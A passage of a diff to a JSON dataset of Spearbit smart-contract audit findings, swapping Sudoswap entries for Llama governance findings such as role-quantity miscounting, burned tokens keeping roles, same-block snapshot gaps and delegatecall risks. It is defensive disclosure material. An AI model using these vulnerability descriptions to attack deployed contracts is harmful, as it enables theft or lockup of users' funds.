// No check on bondingCurve bondingCurveAllowed[bondingCurve] = isAllowed; } function setRouterAllowed(LSSVMRouter _router, bool isAllowed) external onlyOwner { require(address(_router) != address(0), \"0 router address\"); ... routerAllowed[_router] = isAllowed; }", + "title": "Reducing the quantity of a policyholder results in an increase instead of a decrease in totalQuantity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "In Llama, policyholders can approve or disapprove actions. Each policyholder has a quantity which represents their approval casting power. It is possible to update the quantity of an individual policyholder with the setRoleHolder function in the LlamaPolicy. The _setRoleHolder method is not handling the decrease of quantity correctly for the totalQuantity. The totalQuantity describes the sum of the quantities of the individual policyholders for a specific role. In the case of a quantity change, the difference is calculated as follows: uint128 quantityDiff = initialQuantity > quantity ? initialQuantity - quantity : quantity - initialQuantity; However, the quantityDiff is always added instead of being subtracted when the quantity is reduced. This results in an incorrect tracking of the totalQuantity. Adding the quantityDiff should only happen in the increase case. See: LlamaPolicy.sol#L388 // case: willHaveRole=true, hadRoleQuantity=true newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff;", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: High Risk" ] }, { - "title": "Potentially undetected underflow in assembly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions factory(), bondingCurve(), nft(), poolType(), and token() have an assembly based calculation where the paramsLength is subtracted from calldatasize(). Assembly underflow checks are disregarded and if too few parameters are supplied in calls to the functions in the LSSVMPair contract, this calculation may underflow, resulting in the values for factory(), bondingCurve(), nft(), poolType(), and token() being read from unexpected pieces of memory. This will usually be zeroed, therefore execution will stop at some point. However, it is safer to prevent this from ever happening. function factory() public pure returns (LSSVMPairFactoryLike _factory) { ... assembly {_factory := shr(0x60,calldataload(sub(calldatasize(), paramsLength)))} } function bondingCurve() public pure returns (ICurve _bondingCurve) { ... assembly {_bondingCurve := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 20)))} } function nft() public pure returns (IERC721 _nft) { ... assembly {_nft := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 40)))} } function poolType() public pure returns (PoolType _poolType) { ... assembly {_poolType := shr(0xf8,calldataload(add(sub(calldatasize(), paramsLength), 60)))} } function token() public pure returns (ERC20 _token) { ... assembly {_token := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 61)))} }", + "title": "LlamaPolicy.revokePolicy cannot be called repeatedly and may result in burned tokens retaining active roles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Llama has two distinct revokePolicy functions. 
The first revokePolicy function removes all roles of a policyholder and burns the associated token. This function iterates over all existing roles, regardless of whether a policyholder still holds the role. In the next step the token is burned. If the total number of roles becomes too high, this transaction might not fit into one block. A second version of the revokePolicy function allows users to pass an array of roles to be removed. This approach should enable the function to be called multiple times, thus avoiding an \"out-of-gas\" error. An out-of-gas error is currently not very likely considering the maximum possible role number of 255. However, the method exists and could be called with a subset of the roles of a policyholder. The method contains the following check: if (balanceOf(policyholder) == 0) revert AddressDoesNotHoldPolicy(policyholder); Therefore, it is not possible to call the method multiple times. The result of a call with a subset of roles would lead to an inconsistent state. The token of the policyholder is burned, but the policyholder could still use the remaining roles in Llama. Important methods like LlamaPolicy.hasRole don't check if the token has been burned. (See LlamaPolicy.sol#L250)", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Check number of NFTs is not 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Functions swapNFTsForToken(), routerSwapNFTsForToken(), and getSellNFTQuote() in LSSVMPair.sol do not perform input verification on the number of NFTs. If _bondingCurve.getSellInfo() accidentally happens to return a non-zero value, then an unfair amount of tokens will be given back to the caller. The current two versions of bondingCurve do return 0, but a future version might accidentally return non-zero. Note: 1. getSellInfo() is supposed to return an error when numNFTs == 0, but this does not always happen. This error code is not always checked. function swapNFTsForToken(uint256[] calldata nftIds, ...) external virtual returns (uint256 outputAmount) { ... // No check on `nftIds.length` (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., nftIds.length, ...); ... } function routerSwapNFTsForToken(address payable tokenRecipient) ... { ... uint256 numNFTs = _nft.balanceOf(getAssetRecipient()) - _assetRecipientNFTBalanceAtTransferStart; ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., numNFTs, ...); } function getSellNFTQuote(uint256 numNFTs) ... { ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = bondingCurve().getSellInfo(..., numNFTs, ...); ... } 2. For comparison, the function swapTokenForSpecificNFTs() does perform an entry check on the number of requested NFTs. function swapTokenForSpecificNFTs(uint256[] calldata nftIds,...) ... { ... // There is a check on the number of requested `NFT`s require( (nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))), \"Must ask for > 0 and < balanceOf NFTs\"); // check is present ... 
}", + "title": "Role, permission, strategy, and guard management or config errors may prevent creating/approving/queuing/executing actions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "LlamaCore deployment from the factory will only succeed if one of the roles is the BOOTSTRAP_ROLE. As the comments note: // There must be at least one role holder with role ID of 1, since that role ID is initially // given permission to call `setRolePermission`. This is required to reduce the chance that an // instance is deployed with an invalid configuration that results in the instance being unusable. // Role ID 1 is referred to as the bootstrap role. There are still several ways a user can misstep and lose access to LlamaCore. Bootstrap Role Scenarios While the bootstrap role is still needed: 1. Setting an expiry on the bootstrap role's policyholder RoleHolderData and allowing the timestamp to pass. Once passed any caller may remove the BOOTSTRAP_ROLE from expired policyholders. 2. Removing the BOOTSTRAP_ROLE from all policyholders. 3. Revoking the role's permission with setRolePermission(BOOTSTRAP_ROLE, bootstrapPermissionId, false). General Roles and Permissions Similarly, users may allow other permissions to expire, or remove/revoke them, which can leave the contract in a state where no permissions exist to interact with it. The BOOTSTRAP_- ROLE would need to be revoked or otherwise out of use for this to be a problem. Misconfigured Strategies A misconfigured strategy may also result in the inability to process new actions. For example: 1. Setting minApprovals too high. 2. Setting queuingPeriod unreasonably high 3. Calling revokePolicy when doing so would make policy.getRoleSupplyAsQuantitySum(approvalRole) fall below minApprovals (or fall below minApprovals - actionCreatorApprovalRoleQty). 1 & 2 but applied to disapprovals. And more, depending on the strategy (e.g. if a strategy always responded true to isActive). Removal of Strategies It should not be possible to remove the last strategy of a Llama instance It is possible to remove all strategies from an Ilama instance. It would not be possible to create a new action afterward. An action is required to add other strategies back. As a result, the instance would become unusable, and access to funds locked in the Accounts would be lost. Misconfigured Guards An accidentally overly aggressive guard could block all transactions. There is a built-in protection to prevent guards from getting in the way of basic management if (target == address(this) || target == address(policy)) revert CannotUseCoreOrPolicy();. Again, the BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk 22" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Avoid utilizing inside knowledge of functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "ETH based swap functions use isRouter==false and router- Caller==address(0) as parameters to swapTokenForAnyNFTs() and swapToken- ForSpecificNFTs(). These parameters end up in _validateTokenInput(). The LSSVMPairETH version of this function does not use those parameters, so it is not a problem at this point. However, the call actually originates from the Router so functionally isRouter should be true. 
Our concern is that using inside knowledge of the functions might potentially introduce subtle issues in the following scenarios: function robustSwapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... } function robustSwapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... } function _swapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... } function _swapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... } function swapTokenForAnyNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... } function swapTokenForSpecificNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... } abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(..., bool, /*isRouter*/ address, /*routerCaller*/ ...) { // doesn't use isRouter and routerCaller } }", + "title": "LlamaPolicy.hasRole doesn't check if a policyholder holds a token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Incorrect usage of the revokePolicy function can result in a case where the token of a policyholder is already burned but the policyholder still holds a role. The hasRole function doesn't check if, in addition to the role, the policyholder still holds the token to be active. The role could still be used in the Llama system.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Add Reentrancy Guards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The abovementioned permalinks and corresponding functions are listed for Sudoswap's consideration to introduce reentrancy guard modifiers. Currently, there is only one function that uses a reentrancy guard modifier: withdrawAllETH() in LSSVMPairETH.sol#L94. Other functions in the codebase may also require reentrancy guard modifiers. We have only seen reentrancy problems when malicious routers, assetRecipients, curves, factory owner or protocolFeeRecipient are involved. Despite normal prohibitions on this occurrence, it is better to protect one's codebase than regret leaving open vulnerabilities available for potential attackers. There are three categories of functions that Sudoswap should consider applying reentrancy guard modifiers to: functions withdrawing ETH, functions sending ETH, and uses of safeTransferFrom() to external addresses (which will trigger an onERC1155Received() callback to receiving contracts). 
Examples of functions withdrawing ETH within LSSVM: LSSVMPairFactory.sol#L272 LSSVMPairETH.sol#L104 Instances of functions sending ETH within LSSVM: LSSVMPairETH.sol#L34 LSSVMPairETH.sol#L46 A couple of instances that use safeTransferFrom() to call external addresses, which will trigger an onERC1155Received() callback to receiving contracts: LSSVMPairFactory.sol#L428 LSSVMRouter.sol#L544", + "title": "Incorrect isActionApproved behavior if new policyholders get added after the createAction in the same block.timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Llama utilizes Checkpoints to store approval quantities per timestamp. If the current quantity changes, the previous values are preserved. The block.timestamp of createAction is used as a snapshot for the approval. (See: LlamaCore.sol#L597) Thus, in addition to the Checkpoints, the totalQuantity or numberOfHolders at the createAction are included in the snapshot. However, if new policyholders are added or their quantities change after the createAction within the same block.timestamp, they are not considered in the snapshot but remain eligible to cast an approval. For example, if there are four policyholders with a 50% minimum approval: if a new action is created and two policyholders are added subsequently within the same block.timestamp, the numberOfHolders would be 4 in the snapshot instead of 6. All 6 policyholders could participate in the approval, and two approvals would be sufficient instead of 4. Adding new policyholders together with creating a new action could happen easily in a llama script, which allows bundling different actions. If a separate action is used to add a new policyholder, the final execution happens via a public callable function. An attacker could exploit this by trying to execute the add-new-policyholder action right when a new action is created.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Low Risk" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Saving 1 byte off the constructor() code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The dup2 before the return in the code below indicates a possible optimization by rearranging the stack. function cloneETHPair(...) ... { assembly { ... | RETURNDATASIZE // 3d | stack: 0 | PUSH1 runtime (r) // 60 | stack: r 0 | DUP1 // 80 | stack: r r 0 | PUSH1 creation (c) // 60 | stack: c r r 0 | RETURNDATASIZE // 3d | stack: 0 c r r 0 | CODECOPY // 39 | stack: r 0, [0-2d]: runtime code | DUP2 // 81 | stack: 0 r 0, [0-2d]: runtime code | RETURN // f3 | stack: 0, [0-2d]: runtime code ... } }", + "title": "LlamaCore delegate calls can bring Llama into an unusable state", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The core contract in Llama allows the execution of actions through a delegate_call. An action is executed as a delegate_call when the target is added as an authorizedScript. This enables batching multiple tasks into a contract, which can be executed as a single action. In the delegate_call, a script contract could arbitrarily modify any slot of the core contract. The Llama team is aware of this fact and has added additional safety-checks to see if the slot0 has been modified by the delegate_call. The slot0 contains values that should never be allowed to change. 
bytes32 originalStorage = _readSlot0(); (success, result) = actionInfo.target.delegatecall(actionInfo.data); if (originalStorage != _readSlot0()) revert Slot0Changed(); A script might be intended to modify certain storage slots. However, incorrect SSTORE operations can completely break the contract. For example, setting actionsCount = type(uint).max would prevent creating any new actions, and access to funds stored in the Account would be lost.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Decode extradata in calldata in one go", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Spearbit discovered that the functions factory(), bondingCurve() and nft() are called independently but in most use cases all of the data is required.", + "title": "The execution opcode of an action can be changed from call to delegate_call after approval", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "In Llama an action only defines the target address and the function which should be called. An action doesn't implicitly define if the opcode should be a call or a delegate_call. This only depends on whether the target address is added to the authorizedScripts mapping. However, adding a target to the authorizedScripts can be done after the approval in a different action. The authorizedScript action could use a different set of signers with a different approval strategy. The change of adding a target to authorizedScript should not impact actions which are already approved and in the queuing state. This could lead to security issues when policyholders approved the action under the assumption the opcode will be a call instead of a delegate call.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Medium Risk" ] }, { - "title": "Transfer last NFT instead of first", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "When executing _sendAnyNFTsToRecipient() NFTs are retrieved by taking the first available NFT and then sending it to nftRecipient. In (most) ERC721 implementations as well as in the EnumerableSet implementation, the array that stores the ownership is updated by swapping the last element with the selected element, to be able to shrink the array afterwards. When you always transfer the last NFT instead of the first NFT, swapping isn't necessary so gas is saved. Code related to LSSVMPairEnumerable.sol: abstract contract LSSVMPairEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0); // take the first NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); // this calls _beforeTokenTransfer of ERC721Enumerable } } } abstract contract ERC721Enumerable is ERC721, IERC721Enumerable { function _beforeTokenTransfer(address from, address to, uint256 tokenId) internal virtual override { ... _removeTokenFromOwnerEnumeration(from, tokenId); ... } function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId) private { ... 
uint256 lastTokenIndex = ERC721.balanceOf(from) - 1; uint256 tokenIndex = _ownedTokensIndex[tokenId]; // When the token to delete is the last token, the swap operation is unnecessary ==> we can make use of this if (tokenIndex != lastTokenIndex) { uint256 lastTokenId = _ownedTokens[from][lastTokenIndex]; _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token _ownedTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index } // This also deletes the contents at the last position of the array delete _ownedTokensIndex[tokenId]; delete _ownedTokens[from][lastTokenIndex]; } } Code related to LSSVMPairMissingEnumerable.sol: abstract contract LSSVMPairMissingEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = idSet.at(0); // take the first NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); idSet.remove(nftId); // finally calls _remove() } } } library EnumerableSet { function _remove(Set storage set, bytes32 value) private returns (bool) { ... uint256 toDeleteIndex = valueIndex - 1; uint256 lastIndex = set._values.length - 1; if (lastIndex != toDeleteIndex) { // ==> we can make use of this bytes32 lastvalue = set._values[lastIndex]; set._values[toDeleteIndex] = lastvalue; // Move the last value to the index where the value to delete is set._indexes[lastvalue] = valueIndex; // Replace lastvalue's index to valueIndex } set._values.pop(); // Delete the slot where the moved value was stored delete set._indexes[value]; // Delete the index for the deleted slot ... } }", + "title": "LlamaFactory is governed by Llama itself", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Llama uses its own governance system to govern the LlamaFactory contract. The LlamaFactory contract is responsible for authorizing new LlamaStrategies. We can identify several potential drawbacks with this approach. If only a single strategy contract is used and a critical bug is discovered, the implications could be significant. In such a scenario, it would mean a broken strategy contract needs to be used by the Factory governance to deploy a fixed version of the strategy contract or enable other strategies. The likelihood for this to happen is still low but the implications could be critical.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Low Risk" ] }, { - "title": "Simplify the connection between Pair and Router", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "There are two ways to interact between Pair and Router: 1. LSSVMPairERC20.sol calls router.pairTransferERC20From, where the goal is to transfer ERC20. 2. _swapNFTsForToken calls pair.cacheAssetRecipientNFTBalance and pair.routerSwapNFTsForToken, where the goal is to transfer NFTs. Using two different patterns to solve the same problem makes the code more complex and larger than necessary. Patterns with cacheAssetRecipientNFTBalance() are also error prone. abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(..., bool isRouter, ...) ... { ... if (isRouter) { LSSVMRouter router = LSSVMRouter(payable(msg.sender)); // Verify if router is allowed require(_factory.routerAllowed(router), \"Not router\"); ... 
router.pairTransferERC20From( _token, routerCaller, _assetRecipient, inputAmount, pairVariant() ); ... } ... } } contract LSSVMRouter { function pairTransferERC20From(...) ... { // verify caller is a trusted pair contract require(factory.isPair(msg.sender, variant), \"Not pair\"); ... // transfer tokens to pair token.safeTransferFrom(from, to, amount); // transfer ERC20 from the original caller } } contract LSSVMRouter { function _swapNFTsForToken(...) ... { ... // Cache current asset recipient balance swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { nft.safeTransferFrom(msg.sender, assetRecipient, swapList[i].nftIds[j]); // transfer NFTs from the original caller } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); ... } } abstract contract LSSVMPair is Ownable, ReentrancyGuard { function cacheAssetRecipientNFTBalance() external { require(factory().routerAllowed(LSSVMRouter(payable(msg.sender))), \"Not router\"); // Verify if router is allowed assetRecipientNFTBalanceAtTransferStart = nft().balanceOf(getAssetRecipient()) + 2; } }", + "title": "The permissionId doesn't include call or delegate-call for LlamaAccount.execute", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Whether LlamaAccount.execute performs a delegate_call depends on the bool flag parameter withDelegatecall. This parameter is not included in the permissionId, which controls role permissions in Llama. The permissionId in Llama is calculated in the following way: PermissionData memory permission = PermissionData(target, bytes4(data), strategy); bytes32 permissionId = keccak256(abi.encode(permission)); The permissionId required for a role to perform an action only includes the function signature but not the parameters themselves. It is impossible to define the opcode as part of the permissionId.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Low Risk" ] }, { - "title": "Cache array length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "An array length is frequently used in for loops. This value is evaluated on every iteration of the loop. Assuming the arrays are regularly larger than 1, it saves some gas to store the array length in a temporary variable. The following snippets are samples of the above context for lines of code where this is relevant: LSSVMPairEnumerable.sol#L51 LSSVMPairFactory.sol#L378 LSSVMPairMissingEnumerable.sol#L57 LSSVMRouter.sol#L358 For more examples, please see the context above for exact lines where this applies. The following contains examples of the overuse of nftIds.length: function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),\"Must ask for > 0 and < balanceOf NFTs\"); ... (error, newSpotPrice, inputAmount, protocolFee) = _bondingCurve.getBuyInfo( spotPrice, delta, nftIds.length, fee, _factory.protocolFeeMultiplier() ); ... }", + "title": "Nonconforming EIP-712 typehash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Incorrect strings are used in computing the EIP-712 typehash. 1. The strings contain a space( ) after the comma(,), which is not standard EIP-712 behaviour. 2. ActionInfo is not used in the typehash. 
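For illustration, a sketch of a conforming definition (the struct and its members are assumptions, not the exact Llama types):
// Hypothetical: no space after commas, and referenced structs such as
// ActionInfo appended to the encoded type string per EIP-712.
bytes32 constant APPROVAL_TYPEHASH = keccak256(
    \"Approval(ActionInfo actionInfo,uint8 role,string reason,uint256 nonce)ActionInfo(uint256 id,address creator)\"
);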
There will be a mismatch when comparing to hashes produced by JS libraries or Solidity (if implemented), etc. Not adhering to the EIP-712 spec means wallets will not render correctly and any supporting tools will produce a different typehash.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Gas Optimization" + "Llama", + "Severity: Low Risk" ] }, { - "title": "Use Custom Errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "Strings are used to encode error messages. With the current Solidity versions it is possible to replace them with custom errors, which are more gas efficient. Example of non-custom errors used in LSSVM: LSSVMRouter.sol#L604 require(block.timestamp <= deadline, \"Deadline passed\"); LSSVMRouter.sol#L788 require(outputAmount >= minOutput, \"outputAmount too low\"); Note: This pattern has been used in Ownable.sol#L6-L7", + "title": "Various events do not add the role as parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Note: During the audit, the client discovered an issue that affects their off-chain infrastructure. Various events do not emit the role as parameter: 1. event ActionCreated(uint256 id, address indexed creator, ILlamaStrategy indexed strategy, address indexed target, uint256 value, bytes data, string description); 2. event ApprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason); 3. event DisapprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason);", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "LlamaCore doesn't check if minExecutionTime returned by strategy is in the past", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "The minExecutionTime returned by a strategy is not validated.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "Address parsing from tokenId to address string does not account for leading 0s", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Policy tokenIds are derived from the holder's account address. The address is intended to be displayed in the svg generated when calling tokenURI. Currently, leading 0s are truncated, rendering the incorrect address string: e.g. 0x015b... vs 0x0000...be60 for address 0x0000000000015B23C7e20b0eA5eBd84c39dCbE60.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "The ALL_HOLDERS_ROLE can be set as a force role by mistake", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "During the initialization, an array of roles that must be assigned as force approval/disapproval can be sent. The logic does not account for ALL_HOLDERS_ROLE (which is role id 0, the default value of uint8), which can be sent as a mistake by the user. This is a low issue, as if the above scenario happens, the strategy can become obsolete, which will force the owner to redeploy the strategy with correct initialization configs. 
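A minimal sketch of a possible initialization guard (all names illustrative):
// Hypothetical check while registering force roles during initialization:
for (uint256 i = 0; i < forceApprovalRoles.length; i++) {
    if (forceApprovalRoles[i] == 0) revert(); // role id 0 is ALL_HOLDERS_ROLE
    forceApprovalRole[forceApprovalRoles[i]] = true;
}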
We must mention that the force roles cannot be changed after they are set within the initialization.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "LlamaPolicy.setRolePermission allows setting permissions for non-existing roles", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "It is possible to set a permission for a role that doesn't exist yet. In other functions, like assigning a role to a policyholder, this check happens. (See: LlamaPolicy.sol#L343) A related issue, very close to this, is the updateRoleDescription method, which can emit an event for a role that does not exist. This is just an informational issue as it does not affect the on-chain logic; it might affect off-chain logic if anything ever relies on it.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "During the audit, the client discovered an issue that affects their off-chain infrastructure. The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity. From an off-chain perspective, there is currently no way to get the quantity assigned for a role to a policyholder at role assignment time. The event would be more useful if it emitted quantity instead of currentRoleSupply (since the latter can just be calculated off-chain from the former).", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "ETH can remain in the contract if msg.value is greater than expected", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "When an action is created, the creator can specify an amount of ETH that needs to be sent when executing the transaction. This is necessary in order to forward ETH to a target call. Currently, when executing the action the msg.value is checked to be at least the required amount of ETH needed to be forwarded. if (msg.value < actionInfo.value) revert InsufficientMsgValue(); This can result in ETH remaining in the contract after the execution. From our point of view, LlamaCore should not hold any balance of ETH.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "Cannot re-authorize an unauthorized strategy config", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Strategies are deployed using a create2 salt. The salt is derived from the strategy config itself (see LlamaCore.sol#L709-L710). This means that any unauthorized strategy cannot be used in the future, even if a user decides to re-enable it.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "Signed messages may not be cancelled", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Creating, approving, and disapproving actions may all be done by signing a message and having another account call the relevant *BySig function. 
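For context, a rough sketch of the pattern (the mapping layout is an assumption): the signed digest binds a per-policyholder nonce that is only consumed when a *BySig call succeeds:
// Sketch: an unused signature stays valid because its nonce is never bumped.
mapping(address => mapping(bytes4 => uint256)) public nonces;
uint256 nonce = nonces[policyholder][msg.sig];
nonces[policyholder][msg.sig] = nonce + 1; // incremented only on successful use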
Currently, there is no way for a signed message to be revoked without a successful *BySig function call containing the nonce of the message to be revoked.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "LlamaCore name open to squatting or impersonation", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "When deploying a LlamaCore clone, the create2 salt is derived from the name. This means that no two may have the same name, and name squatting, or impersonation, may occur.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "Expired policyholders are active until they are explicitly revoked", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Each policyholder in Llama has an expiration timestamp. However, a policyholder can still use the power of their role after the expiration has passed. The final revoke only happens after the public LlamaPolicy.revokeExpiredRole method is called. Anyone can call this method after the expiration timestamp has passed. For the Llama system to function effectively with role expiration, it is essential that external keepers vigilantly monitor the contract and promptly revoke expired roles. A final revoke exactly at the expiration cannot be guaranteed.", "labels": [ "Spearbit", "Llama", "Severity: Low Risk" ] }, { "title": "Gas optimizations", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Throughout the codebase we've identified gas improvements that were aggregated into one issue for better management. RelativeStrategy.sol#L159 The if (disapprovalPolicySupply == 0) revert RoleHasZeroSupply(disapprovalRole); check and actionDisapprovalSupply[actionInfo.id] = disapprovalPolicySupply; can be wrapped in an if block in case disapprovals are enabled. The uint128 newNumberOfHolders; and uint128 newTotalQuantity; variables are obsolete as the updates on the currentRoleSupply can be done in the if branches. LlamaPolicy.sol#L380-L392 The exists check is redundant LlamaPolicy.sol#L252 The _validateActionInfoHash(action.infoHash, actionInfo); is redundant as it's already done in the getActionState LlamaCore.sol#L292 LlamaCore.sol#L280 LlamaCore.sol#L672 Finding the BOOTSTRAP_ROLE in LlamaFactory._deploy could happen by expecting the role at a certain position, like position 0, instead of paying gas for an on-chain search operation to iterate the array. LlamaFactory.sol#L205 quantityDiff calculation is guaranteed not to overflow as the ternary checks initialQuantity > quantity before subtracting. Infeasible for numberOfHolders and totalQuantity to overflow. See also LlamaPolicy.sol#L422-L423 Infeasible for numberOfHolders to overflow.", "labels": [ "Spearbit", "Llama", "Severity: Gas Optimization" ] }, { "title": "Unused code", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", "body": "Various parts of the code are unused or unnecessary. 
